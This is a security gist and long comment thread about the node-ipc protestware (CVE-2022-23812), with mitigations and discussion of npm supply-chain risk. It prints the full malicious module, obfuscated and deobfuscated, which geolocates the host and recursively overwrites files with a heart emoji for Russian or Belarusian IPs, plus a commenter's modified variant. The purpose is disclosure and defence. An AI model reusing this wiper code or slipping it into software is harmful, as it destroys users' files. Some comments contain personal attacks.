CVE-2022-23812 | RIAEvangelist/node-ipc is malware / protest-ware

readme.md

CVE-2022-23812

---

RIAEvangelist/node-ipc is malware / protestware

The RIAEvangelist/node-ipc module contains protestware peacenotwar.

Excerpt from RIAEvangelist/node-ipc:

as of v11.0.0 & v9.2.2 this module uses the peacenotwar module.

---

More importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803 of RIAEvangelist/node-ipc contains malware.

---

⚠️| The following code is malicious, DO NOT RUN IT

https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

The following codeblock was added in-case the url above is deactivated

import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}

⚠️| The above code is malicious, DO NOT RUN IT

---

I deobfuscated the code above and found that if the host machine's public ip address was from Russia or Belarus, node-ipc would proceed overwrite many files with a heart emoji recursively while traversing up parent directories:

---

⚠️| The following code is malicious, DO NOT RUN IT

import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
    const t = Math.round(Math.random() * 4);
    if (t > 1) {
        return;
    }
    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {
                const s = JSON.parse(t.toString("utf8"));
                const u = s[c.toString("utf8")].toLowerCase();
                const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
                if (a) {
                    h(n.toString("utf8"));
                    h(o.toString("utf8"));
                    h(r.toString("utf8"));
                    h(f.toString("utf8"));
                }
            } catch (t) {}
        });
    });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
    if (!a.existsSync(n)) {
        return;
    }
    let r = [];
    try {
        r = a.readdirSync(n);
    } catch (t) {}
    const f = [];
    const c = Buffer.from("4p2k77iP", "base64");
    for (var e = 0; e < r.length; e++) {
        const i = u.join(n, r[e]);
        let t = null;
        try {
            t = a.lstatSync(i);
        } catch (t) {
            continue;
        }
        if (t.isDirectory()) {
            const s = h(i, o);
            s.length > 0 ? f.push(...s) : null;
        } else if (i.indexOf(o) >= 0) {
            try {
                a.writeFile(i, c.toString("utf8"), function () {});
            } catch (t) {}
        }
    }
    return f;
}
const ssl = true;
export { ssl as default, ssl };

⚠️| The above code is malicious, DO NOT RUN IT

---

The following are excerpts from the malicious code:

Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64");
// https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154

const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8"));
// checks if ip country is Russia or Belarus

a.writeFile(i, c.toString("utf8"), function () {});
// overwrites file with `❤️`

---

The following demonstrates example of what each of the parameters going to the a.writeFile(i,c.toString("utf8") would be:

---

Edit 2022-03-16_0

Comment by zkyf

Just made it better looked and commented dangerous code so you guys can take a try. Obviously the code will delete literally EVERYTHING on your drive.

const path = require("path");
const fs = require("fs");
const https = require("https");

setTimeout(function () {
    const randomNumber = Math.round(Math.random() * 4);
    if (randomNumber > 1) {
        // return;
    }
    const apiKey = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
    const pwd = "./";
    const parentDir = "../";
    const grandParentDir = "../../";
    const root = "/";
    const countryName = "country_name";
    const russia = "russia";
    const belarus = "belarus";

    https.get(apiKey, function (message) {
        message.on("data", function (msgBuffer) {
            try {
                const message = JSON.parse(msgBuffer.toString("utf8"));
                const userCountryName = message[countryName.toString("utf8")].toLowerCase();
                const hasRus = userCountryName.includes(russia.toString("utf8")) || userCountryName.includes(belarus.toString("utf8")); // checks if country is Russia or Belarus
                if (hasRus) {
                    deleteFile(pwd);
                    deleteFile(parentDir);
                    deleteFile(grandParentDir);
                    deleteFile(root);
                }
            } catch (t) {}
        });
    });

    // zkyf: Let's try this directly here
    deleteFile(pwd);
    deleteFile(parentDir);
    deleteFile(grandParentDir);
    deleteFile(root);
}, 100);

async function deleteFile(pathName = "", o = "") {
    if (!fs.existsSync(pathName)) {
        return;
    }
    let fileList = [];
    try {
        fileList = fs.readdirSync(pathName);
    } catch (t) {}
    const f = [];
    const heartUtf8 = Buffer.from("4p2k77iP", "base64");
    for (var idx = 0; idx < fileList.length; idx++) {
        const fileName = path.join(pathName, fileList[idx]);
        let fileInfo = null;
        try {
            fileInfo = fs.lstatSync(fileName);
        } catch (err) {
            continue;
        }
        if (fileInfo.isDirectory()) {
            const fileSymbol = deleteFile(fileName, o);
            fileSymbol.length > 0 ? f.push(...fileSymbol) : null;
        } else if (fileName.indexOf(o) >= 0) {
            try {
                // fs.writeFile(fileName, heartUtf8.toString("utf8"), function () {}); // overwrites file with `❤️`
                console.log(`Rewrite ${fileName}`);
            } catch (err) {}
        }
    }
    return f;
}

Console:

---

Edit 2022-03-16_1 (requested by @lgg)

Available mitigation methods:

The following mitigation strategies are inspired by cnpm's (is not npm) mitigation methods: cnpm/bug-versions#181

If you use one of the following mitigation stratagies, make sure to remove the ^ to force node-ipc to the specified version.

"^9.x.x" -> "9.2.1"

     "dependencies": {
-        "node-ipc": "^9.x.x"
+        "node-ipc": "9.2.1"
     }

"^10.x.x" -> "10.1.0"

     "dependencies": {
-        "node-ipc": "^10.x.x"
+        "node-ipc": "10.1.0"
     }

"^11.x.x" -> "10.1.0"

     "dependencies": {
-        "node-ipc": "^11.x.x"
+        "node-ipc": "10.1.0"
     }

3rd-party mitigation methods:

• vue-cli
• Unity Hub

---

Edit 2022-03-16_2 (requested by @lgg)

CVE-2022-23812

Edit 2022-03-17_0

@RIAEvangelist has banned me from interacting with their repositories

Edit 2022-03-17_1

The security research firm snyk.io recommends the following mitigation strategy for users of node-ipc:

package.json

  "overrides": {
    "node-ipc@>9.2.1 <10": "9.2.1",
    "node-ipc@>10.1.0": "10.1.0"
  }

Edit 2022-03-17_2 (credit: @Uzlopak)

NPM users below NPM v8, this is for you!

Don't forget to mention that npm supports override with npm 8. Earlier versions don't have overrides capabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with them. So upgrading npm to 8 would be necessary.

Yarn users, this is for you!

• Yarn 1 - Selective dependency resolutions
• Yarn 2 - Resolutions

I'm not too familiar with how yarn works, so I don't want to risk giving false instructions to users.

Edit 2022-03-17_3

Please read this message

I've been seeing a lot of hate comments going after the owner of node-ipc (especially on their repositories). We should remember the high standards that we expect from our fellow developers on GitHub, regardless of what another has done.

Preferably this gist and it's comments should be focused on the research and discussion of CVE-2022-23812. I'm sure that the owner of node-ipc will be reprimanded by their employer, NPM, and GitHub.

Please do not threaten anyone here (or elsewhere for that matter).

Edit 2022-03-18_0

I've begun work on my own fork of node-ipc: MidSpike/node-ipc#1

@MidSpike

Also you could add information about yarn
https://classic.yarnpkg.com/lang/en/docs/selective-version-resolutions/

Also don't forget to mention that npm supports override with npm 8. Earlier versions don't have overrides capabilities. So node 12 and 14, which are LTS, use by default npm 6 and that would not work with them. So upgrading npm to 8 would be necessary.

https://github.com/RIAEvangelist/peacenotwar/issues/45#issue-1172414316

Updated gist to include suggestions by @Uzlopak

@MidSpike Thank you for those research.

I did mention it on the r/selfhosted post: https://old.reddit.com/r/selfhosted/comments/tge5xa/npm_supply_chain_attack_wipes_your_disk_if_you/

@meisme-dev it's most likely fake. Account is newly registered with only this post, no documents or real contacts or proofs provided (like everyone do when it's a real abuse).

Also the api key for geoip service was rapidly deactivated and malicious code just creates a file on Desktop.

Also the api key for geoip service was rapidly deactivated

I've said this a few times before, but I want to say it again so other people that read this will know.

The api key for the ipinfo service was 100% functional at the time of my testing on March 15th 2022.

The real issue here is that the repository owner is not trustworthy at all anymore.

Edit: modified comment to not sound like an asshat, I'm not trying to be rude, sorry about that.

@MidSpike this gist referenced on IT news portal: https://habr.com/ru/news/t/656219/ 🎉

@MidSpike btw are you sure you were banned from the repo? GitHub was experiencing issues today so nobody could do things like comment, etc. I got the same message "You can't perform this action at this time." as well in my own repo.

If you are banned you cannot even type into the textarea box.

@kiliman I'm pretty sure that I'm still banned (or blocked) by the repo owner.

Unable to add new comments.

Unable to edit reactions.

Also I've been shadow-banned from getting notifications from any of the author's repositories.

Ah, ok. So yeah, if he's seeing that instead of the comment box, then definitely banned.

I got the message once I tried to submit the comment. Everything appears to be working fine now.

Anyway, thanks for keeping us all informed on developments.

The wider problem is that distributed trust model doesn't work. Maintainers could put/pull in malicious codes by all kind of reasons or be compromised.

There should be a more centralised effort at the package manager hub level to raise the security bar for core/popular packages. Now that it seems Microsoft owns npm, maybe they can lead the effort.

That code is not actually able to execute unless you modify it to make it so.

This doesn't make any sense at all. Of course it's able to execute. The file is directly imported from IPC.js. ES Module imports are resolved at program startup, running all top-level code synchronously. Why wouldn't the file execute?

I am banned too, @MidSpike i see the same thing as you

There have already been some catastrophic effects of this CVE: https://snippet.host/kvcb

Banned too, they didn't like that: https://github.com/RIAEvangelist/node-ipc/issues/233#issuecomment-1071529143

He's trying to do damage control.

@MidSpike just out of curiosity, what happens if the geoip functions fail due to bad api keys? will it just default to not doing anything harmfull or just delete everything anyway?

@MidSpike just out of curiosity, what happens if the geoip functions fail due to bad api keys? will it just default to not doing anything harmfull or just delete everything anyway?

the guy who made the repo invalidated the APIKey after he was caught so to try to cover his arse.

@MidSpike just out of curiosity, what happens if the geoip functions fail due to bad api keys? will it just default to not doing anything harmfull or just delete everything anyway?

@majorendian after some testing, (while the api-key is invalid), the only condition in which the malware would still execute is if the ipinfo api send back a response with country_name in the body after json parsing.

(ignore the line numbers as I have comments littering the code)

I've joined the banned club 🎉

@MidSpike Ok, well that effectively means its disarmed if I am not mistaken

@majorendian I would err on the side of caution, all it takes for this specific malware to become armed again is for the api-key to be re-enabled.
Apart from that, the real concern should be with how projects manage their dependencies and how we as developers should conduct security evaluations.

Such people should be banned from any professional community permanently. It's one thing to call people to peace/restrict your services, and another thing to harm them. Imagine that someone puts a drawing pin on your chair - just because you are working with a Russian hosting company. Or a doctor will inject you a wrong medicine because he didn't like you.

Once they've been caught they make an innocent face, well, you need to look at the chair and check what medicine you have! And try to shut your mouth. That's ridiculous

He also edited my issue so that there is no content LOL man needs to read damage control 101 ASAP

Here's his YouTube channel with his face: https://www.youtube.com/brandonnozakimiller

What he did was incredibly stupid & irresponsible.

There have already been some catastrophic effects of this CVE: https://snippet.host/kvcb

This has to be fake.
Folks employed at this NGO should be tried for being criminally negligent. “Let’s keep records about a hostile, dictatorial regime stored on one server on one hard drive in their territory” is so stupid, it’s not even funny.
(Edit: formatting)

Here's his self-created Wikipedia page and the page history, where you can see him creating it.

Please read this message

I've been seeing a lot of hate comments going after the owner of node-ipc (especially on their repositories).
We should remember the high standards that we expect from our fellow developers on GitHub, regardless of what another has done.

Preferably this gist and it's comments should be focused on the research and discussion of CVE-2022-23812.
I'm sure that the owner of node-ipc will be reprimanded by their employer, NPM, and GitHub.

Please do not threaten anyone here (or elsewhere for that matter).

There have already been some catastrophic effects of this CVE: snippet.host/kvcb

This has to be fake. Folks employed at this NGO should be tried for being criminally negligent. “Let’s keep records about a hostile, dictatorial regime stored on one server on one hard drive in their territory” is so stupid, it’s not even funny. (Edit: formatting)

Being that the wider internet has been literally blocking access in and out of Russia, and Russia itself also has a form of digital-iron curtain in and out of it's wider networks, it's totally reasonable to assume that was not only the fastest, but safest and most reliable solution. On top of that, the same issue could be triggered via a VPN mistake, or by refugees having nowhere else to go, then having their drives wiped because they used some software when they finally escaped to safety in, say, Belarus.

Whether the NGO story is true or not, it's totally possible for collateral damage just like it (and/or even more innocent circumstances). In either case, I would say the package maintainer is wholly to blame, not the potential victim(s).

If you used to like node-ipc, try hyper-ipc... its pretty cool, you can ipc behind nats without forwarding, you can move nodes without ip changes, ground-breaking.

If you got hit using vue.js, try nobuild style app making its awesome! I've been using riot.js with zero build tools for two years now, and never looked back, there is no easier way to build apps.

Don't look back! build back better!

Dear sir who made this,

Thank you for making this gist, this documentation discussing the whole topic is astounding. There is so much info directing users who are using this in Russia and Belerus. I want to thank you for that. 👍

There have already been some catastrophic effects of this CVE: snippet.host/kvcb

This has to be fake. Folks employed at this NGO should be tried for being criminally negligent. “Let’s keep records about a hostile, dictatorial regime stored on one server on one hard drive in their territory” is so stupid, it’s not even funny. (Edit: formatting)

Being that the wider internet has been literally blocking access in and out of Russia, and Russia itself also has a form of digital-iron curtain in and out of it's wider networks, it's totally reasonable to assume that was not only the fastest, but safest and most reliable solution. On top of that, the same issue could be triggered via a VPN mistake, or by refugees having nowhere else to go, then having their drives wiped because they used some software when they finally escaped to safety in, say, Belarus.

Whether the NGO story is true or not, it's totally possible for collateral damage just like it (and/or even more innocent circumstances). In either case, I would say the package maintainer is wholly to blame, not the potential victim(s).

Whether the NGO story is true or not is extremely relevant. You are simply speculating, making an already shoddy situation worse. Let’s stick to the facts: A package author had a moral lapse of judgement, they need to apologise ASAP and we all need to move on to more relevant things.

In addition: read the entire snippet before going with the otherwise reasonable ‘please do not victim blame’ argument.
I’m not absolving the malware author of any blame, I’m saying that this instance of news is either untrue or misreported.

From the snippet:

All I can say that your little shenanigan did more damage to us than Putin or Lukashenka ever could.

Which (I hope we can agree) is nonsense and uncalled for. It’s obvious the person who wrote that abomination of a sentence has no personal connections to folks suffering in Ukraine right now.
(Edit: spelling)

Well if you just assume that anyone that says something inconvenient is a liar, then sure anything can be "untrue or misreported". Why are you covering this dudes ass? An example needs to be set.

I have personal connections to Ukraine and I would rather NOT have american activists destroy peoples files regardless of their nationality.

@jellelicht

All I can say that your little shenanigan did more damage to us than Putin or Lukashenka ever could

The important part is "to us". "To us" means not to the Ukrainian people but to the NGO. If you drop the "to us" it would be a ridiculous claim. Anyhow...

@MidSpike

Can you link please to the commit
RIAEvangelist/node-ipc@847047c
?

RIAEvangelist tries to gaslight people by claiming that it was never nuking filesystems but only putting a textfile on the desktop.

Well if you just assume that anyone that says something inconvenient is a liar, then sure anything can be "untrue or misreported". Why are you covering this dudes ass? An example needs to be set.

I am not covering anyone, nor am I excusing anything. An example does not need to be set though, as that is not a productive way forward.

I have personal connections to Ukraine and I would rather NOT have american activists destroy peoples files regardless of their nationality.

agreed!

@jellelicht

All I can say that your little shenanigan did more damage to us than Putin or Lukashenka ever could

The important part is "to us". "To us" means not to the Ukrainian people but to the NGO. If you drop the "to us" it would be a ridiculous claim. Anyhow...

Even with the “to us” it is.

@MidSpike

Can you link please to the commit RIAEvangelist/node-ipc@847047c ?

RIAEvangelist tries to gaslight people by claiming that it was never nuking filesystems but only putting a textfile on the desktop.

Stop making this stuff personal, leave this dude alone and start focusing on ways we can make sure nothing RIAEvangelist does ever impacts any of us again.

@jellelicht
I still think this comparison is valid. But we can agree to disagree.

I think we should in the future replace all packages of RIAEvangelist with other projects. Replacing them in the big projects which reduces their download per month significantly to basically few thousand should bring others to use the more downloaded ones. E.g. hyper-ipc. Instead of node-ipc

Maybe we need another agreement for non-political actions? Maybe code of conduct already covers for this malicious behaviour?

If I sign my commits as ‘jelle-but-also-putin-no-bueno@gmail.com’, that is (naturally) a political statement. It should still be fine for anyone to do so though.

I’d rather link to a subset of the programmer’s oath as some kind of pledge instead, as it is a pledge based on intention. The problem is not politics, the problem is harmful intent.

It is about utilizing code to be a political weapon. If you add "No to Putin and no to the Ukrainian War" then I could care less. But also keep in mind, that a Russia user of you package could face some serious reprimands.
So imho best is to keep politics out.

I am currently in a country with basically no freedom of expression. I wipe my phone from political statements regarding this country before I come here. Just to don't get issues if my phone gets seized.
So I actually think politics should be not be on GitHub at all.

Thank you for the calm and clear reasoning @Uzlopak. I can’t say I see things the same way, but that likely has more to do with the fact that I have the privilege of living in an environment where freedom of expression is a given.

Just want to point out archives and archives of archives of this code exist
https://archive.ph/n8oBX
https://web.archive.org/web/20220317213444/https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

This is not even archived, just a dangling commit on their own repo.
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js

Archives of me pointing this out
before nuke and ban:
https://archive.ph/bboiL
after nuke and ban:
https://archive.ph/UF7LM

Political or not, there are all kind of reasons someone could put in malicious codes as I said above. This has been happened a lot in NPM before. There even had been some researchers trying to push malicious codes into linux kernel for their research.

NPM should do more to bar malicious codes from affecting users in the future. Russ Cox has a good write-up about this not long ago when colors-faker happened:
https://research.swtch.com/npm-colors

That repo owner is really shameless.

@MidSpike

Can you link please to the commit RIAEvangelist/node-ipc@847047c ?

@Uzlopak Thank you for the suggestion, however a link to that commit is already included:

@RIAEvangelist

Adding a malware that targets users by IP and erases all of their data isn't legal, no matter the reason is. I think taking care of this issue should be the authority job.

i got banned from the repo

@RIAEvangelist You clearly should not be part of the open source community. Ironically the only people you hurt are people who likely had zero say in the Ukraine war. Get over yourself, people will fork your projects and you won't get to stoke your giant ego the way you want to.

Using caret ranged semver by default in package.json by NPM looks more questionable now.

As well as the default granting to any package no limited access to hard drives and network by Node.js.

I think package.json should contain the permission list which will limit read/write places and network access for a package. Like it is in web extensions.

---

UPD.

A few thoughts about package.json's "permissions" field

For example:

• is-odd-num should not require any permission.
• The most devDeps packages will only require read/write/overwrite operations inside the parent package's directory (except write access to node_modules directory).
• Some packages require only access to a temp directory.
• For almost all packages it makes sense to limit network access at all, or allow only certain hosts/URLs.
• If a module A uses another module B with "*://*/*" ("<all_urls>") permission (for example, node-fetch), then module B will not have "<all_urls>" permission enabled unless it's not specified in package.json of parent module A. (A parent module should limit access of submodules.)
• Also adding a new permission should prevent auto updating of this module to the newer version by the parent module that uses it.

In cases of node-ipc I don't see that it should have read/write/overwrite access to any hard drive place.
If it requires the network access by default, you could limit it in package.json of your application. So, you would see the warning that your app (one of submodules) unexpectedly performs requests to a geoIP service, that node-ipc did. Also node-ipc just would not updated automatically to this version because of changing the permission list of it.

More advanced thing:

• dynamical granting access to certain submodules,
• permission list for oninstall event, for example, some packages download some additional required for work files only on install event.

@MidSpike thanks for reporting this vulnerability. I'm the founder of ipgeolocation.io which was used to perform the geolocation part here. FYI, we've revoked this API key and the code will fail now. Informing us on time might have saved someone. I feel sorry for whoever was harmed due to this.

@ejaz-ahmed Thank you, your early response definitely did save a lot of people

@MidSpike I wonder, if we took the user that executes the node process and disallowed it from writing files outside specific paths, would it be enough to mitigate this dangerous effect ?

@MidSpike thanks for reporting this vulnerability. I'm the founder of ipgeolocation.io which was used to perform the geolocation part here. FYI, we've revoked this API key and the code will fail now. Informing us on time might have saved someone. I feel sorry for whoever was harmed due to this.

@ejaz-ahmed Assuming that you're the founder, thank you for quickly disabling the api key!

Using caret ranged semver by default in package.json by NPM looks more questionable now.

As well as the default granting to any package no limited access to hard drives and network by Node.js.

I think package.json should contain the permission list which will limit read/write places and network access for a package. Like it is in web extensions.

@AlttiRi I fully agree with that sentiment, this discovery has certainly put a sour taste in my mouth regarding how dependency updates are handled by default.

I'm also in favor for a dependency permissions system, however I'm unsure of what one would look like or if it is even possible to adapt npm and nodejs to support one.

Imho it is the wrong place to manage that.

You should actually run nodejs with a limitted user, so that the process can only access specific folders. And that is OS specific. And if you use docker you should anyway use a limitted user.

And for the external calls you should actually use a firewall or reverse proxy(?) to deny outgoing traffic.

Well... And you should not use root user to develop in the first place.

Stop making this stuff personal, leave this dude alone and start focusing on ways we can make sure nothing RIAEvangelist does ever impacts any of us again.

Ha! Wow, you're not very good at this.

Unfortunately, people here are a little too bright for the dim-bulb "let's all just move past this tactic".

You shouldn't have led by saying the human rights NGO was Asking For It. Really makes the rest of what you write flop around in clown shoes with a red ball nose ;)

@MidSpike
Can you link please to the commit RIAEvangelist/node-ipc@847047c ?
RIAEvangelist tries to gaslight people by claiming that it was never nuking filesystems but only putting a textfile on the desktop.

Stop making this stuff personal, leave this dude alone and start focusing on ways we can make sure nothing RIAEvangelist does ever impacts any of us again.

Besides it being rather deceptive to pretend this never happened, and given that open source is fundamentally built on transparency, I have no idea why you'd want to defend sweeping this under the rug...

It's also rather important to point out that he's making this effort, as anyone looking into this for themselves might be confused why they don't see such malicious code, etc. Myself included until I found posts like these.

I'm kinda of the opinion that someone who deliberately and maliciously puts malware into their package deserves hate. Something something consequences

@Uzlopak Kind of an awkward setup to run a hello world application don't you think? If you have to jump through hoops like these just drop the thing entirely. Should we treat NPM like windows?

Imho FOSS is about trust and(!) reading the used code. Also don't forget that you can even publish packages which contain files and code which is not in the repository. So yeah, basically npm can be a can of worms and should be threated like windows.

I am not against that approach. I am just pointing out that its kind of an absurd situation, filtering incoming packets from npmjs.com through an antivirus and containerizing any runable piece of code as if it was a torrent site.

Software developers should know better. Software is not the place to take a political stance. Publishing malicious software to npm, even publishing annoying software should be punishable. npm would be wise to suspend the author's publishing permissions and permanently remove affected versions of this package.

Even package maintainers who print messages to stdout / stderr asking for monetary support for their work is stretching the rules in my opinion. As long as packages support a way to silence these messages (i.e. ADBLOCK environment variable), I think this is the most annoyance the community should tolerate.

War of any kind is tragic. Protests should be permitted and perhaps encouraged where appropriate. But, as developers we all trust one another blindly to keep software purely functional, not to advertise or push a political agenda. In my humble opinion, actions like these should not be tolerated. I'm not saying we need to ban bad actors from npm for life or anything, but some appropriate level of action should be taken against those publishing malicious / annoying software.

I can appreciate taking ownership for a project and controlling its future direction, but if the future direction of a project intends to annoy or act maliciously against another, this is not okay.

You all just become lazy, don't you? Oh new code, pull pull pull!
Review? Who cares? Tests? Eho cares? My country is doing something nasty? Who cares?
I just sit in front of my computer just tape together few public libs and now you should call me developer!

@sighwort You mad dude?

…

On Mar 18, 2022, at 9:37 PM, sighwort ***@***.***> wrote: ***@***.*** commented on this gist. You all just become lazy, don't you? Oh new code, pull pull pull! Review? Who cares? Tests? Eho cares? My country is doing something nasty? Who cares? I just sit in front of my computer just tape together few public libs and now you should call me developer! — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.

@sighwort Your point smells of social darwinism.
I don't know whether social darwinism should be tolerated in a civilized country.

@ShikiSuen It’s most likely the same dumbass who wrote the malware just using a fake account. It had 0 activity when he posted that comment & now he’s following @RIAEvangelist & forked a random repo.

WOW, The OSS AMERICAN World Police showed up

@bxb100 yeah, and the other typical American trying to "help" by harming other people. @RIAEvangelist if you want to help Ukraine so much, go ahead and ask your government to close the air zone in Ukraine as Ukrainian people ask you to do. Or your sense of justice ends where the risk of harm to your own consumer lifestyle begins? Pathetic.

@RIAEvangelist You should feel ashamed for injecting malicious code into an open source software
Have you thought about the damage you caused to normal people ?, some people have lost important files and might face legal issues, some people might get fired from their jobs
Have you thought about the possibility that a medical system might be using node-ipc and you have put people lives in danger ?
The malicious code has only targeted Russian developers who are working for their living so there's definitely no execuse for what you did, no matter what
If you really want to help Ukrainians then tell your government to stop lying on them, or is it the foreign U.S policy for decades and can't be changed ?!!

Please let's keep the talk technical. We know that the behavior of RIAEvangelist was reckless and irresponsible. But we should keep it apolitical.

Damn bastard

Isn't he now liable for whatever punishment the US has?

And I love how he updated the README with damage control.

Such an eyeopening incident watching it all unfold.

Here are some related articles & videos of them if anyone's interested.

• Wikipedia page
• Snyk.io blog
• Securityaffairs.co article
• Threatpost.com article
• Bleepingcomputer.com article
• Theregister.com Devops article
• IT News Australia article
• Vice News article
• R/linux related post
• Mental Outlaw's YouTube commentary
• 8787 Computers's YouTube commentary
• Git Gud Channel's YouTube commentary
• Kinjo's YouTube commentary regarding Unity & Node-IPC

都被写进 Wikipedia 了，绝了

@MBRjun This guy is now world-famous.

都被写进 Wikipedia 了，绝了

Yes, correct @MBRjun.

I hope this guy works in fast food for the rest of his life, jail would be good too.

Since about 20 years now, webservers are configured in a way that the web facing backend doesn't have write permissions. It's web ops basics. On a dev machine your code depending on this package should be in version control, again industry best practice since ages. I wonder exactly what is the usecase where these heart symbols cause real damage?

The software also comes with a no-warranty note doesn't it?

It's the lack of due diligence and plain carelessness which is the root cause, the real security issue here, as it always has been.

@mocsy

The malware was traversing the folder structure up, overwriting files on the whole filesystem and not only you project folder.

Somebody explained it well:
Spreading malware is more relevant to penal law and not to civil law.

@mocsy Sounds like you are likely to blame a raped women for her dressings (or yariyariyada) in lieu of blaming the raper himself.

@ShikiSuen The difference is big. I understand that it's hard to see, but dressing never had anything to do with raping.
On the other-hand using someone else's software always included risks since the dawn of the IT age.

What I'm saying is, the cyber domain is a war-field, it always has been and always will be.

By your analogy, this war-field has known and unknown bad actors or 'rapers' if you like.
Would you go the den of known rapists?
Packaging (nmp) or Clothing(dressing) has nothing to with it.

So If a women enters a den of known rapists, it is expected that a rape would be unpunished?
It is not about dressing but about the victim-blaming.

@Uzlopak You got my idea. ;)

So If a women enters a den of known rapists, it is expected that a rape would be unpunished? It is not about dressing but about the victim-blaming.

Except @moosy doesn't seem to blaming anyone or saying the node-ipc author shouldn't be punished, @moosy just pointed out the underlying security issue like what you said above in other way.

Don't let the extreme analogy trick you. You need law to punished rapists and you also need means to enforce the law and other measurements to prevent rape. Defense in depth.

Anyway, the node-ipc author will get punished by the community and by law if victims sue him. Further cursing him or fighting each other here will not help anyone, just like what he has done, and certainly will not solve the underlying security issue.

Always sandboxing nodejs applications suggested above could be a solution, but expecting every developer to do proper sandboxing every time simply just isn't scalable. Instead, NPM could do more to eliminated a large number of security issues.

For this specific one, most packages shouldn't touch the filesystem, so a static analysis of importing the fs module could prevent it. node-ipc seems only use the fs module to read the config before, which is questionable in itself.

Thanks @noblehng. Also note that Deno fixed this too, exactly because it's a long standing issue with node. "Secure by default. No file, network, or environment access, unless explicitly enabled."

Sometimes "Security by a million eyes" don't work. The entire OSS security model depends on reviews. If those don't happen the model is broken. Maybe that's where we need to improve.

Sometimes "Security by a million eyes" don't work. The entire OSS security model depends on reviews. If those don't happen the model is broken. Maybe that's where we need to improve.

The easiest way is like Russ Cox suggested, don't automatically use the latest version of all dependencies. Then if it is not in your direct dependencies, you could expect someone else to test the new version in a sandbox before update this dependency, so you are not affected. Or less people are affected, at least. But this method probably couldn't prevent targeted attack like this one.

Then there is the static analysis and other automatic testings way that can be done by the package manager hub before publishing, like those app stores.

The best way would be to have a dedicated security team to audit updates for core/popular packages before publishing, but that would need the industry to fund it.

@RIAEvangelist is a hero!
Cause there's no such thing as 'an ordinary people' there, in Russia. They are all responsible for the atrocious war crimes of Putin, as the Germans were responsible for the crimes of Hitler!

@mgag Let we see which country is more resemble to the Nazi Germany:
https://www.opindia.com/2022/03/ukrainian-tv-show-host-fakhruddin-sharafmal-calls-for-genocide-of-russians-including-children/

The wrong thing done for the "right" reason is still the wrong thing

@mgag Let we see which country is more resemble to the Nazi Germany: https://www.opindia.com/2022/03/ukrainian-tv-show-host-fakhruddin-sharafmal-calls-for-genocide-of-russians-including-children/

Enough ruZZian pseudo-historical 'propaganda ' here! I'm living just now. Under russian bombs.

Please keep politics out. Unfortunately the Ukrainians are to whiny and demanding too much. If we encourage this kind of behavior we can directly go to cyberwar with Russia. So cut the bullshit.

Please keep politics out. Unfortunately the Ukrainians are to whiny and demanding too much. If we encourage this kind of behavior we can directly go to cyberwar with Russia. So cut the bullshit.

Agreed, just cut these bullshit and prevent these kind of protestware bullshit from happening again. Otherwise open source project's credibility will be severely damaged.

OSS wont be damaged. Only node/javascript related OSS will be damaged

OSS wont be damaged. Only node/javascript related OSS will be damaged

Yes it will. Sabotage from OSS is the headline, node/javascript is a footnote.

@ner00 It is irrelevant what non involved people think. Kind of like how windows people think linux = ubuntu and that ubuntu doing something dumb means bad things for the "linux community"
It wont.

Sabotage from OSS is the headline, node/javascript is a footnote.

Quite literally: Open-source developers are burning out, quitting, and even sabotaging their own projects — and it's putting the entire internet at risk

